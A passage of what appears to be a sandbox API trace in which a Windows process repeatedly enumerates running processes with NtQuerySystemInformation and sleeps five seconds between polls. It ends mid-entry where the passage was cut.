[0210.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.509] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.523] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.548] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.554] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.560] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.567] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.574] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.587] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.594] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.601] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.616] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.638] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.645] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, 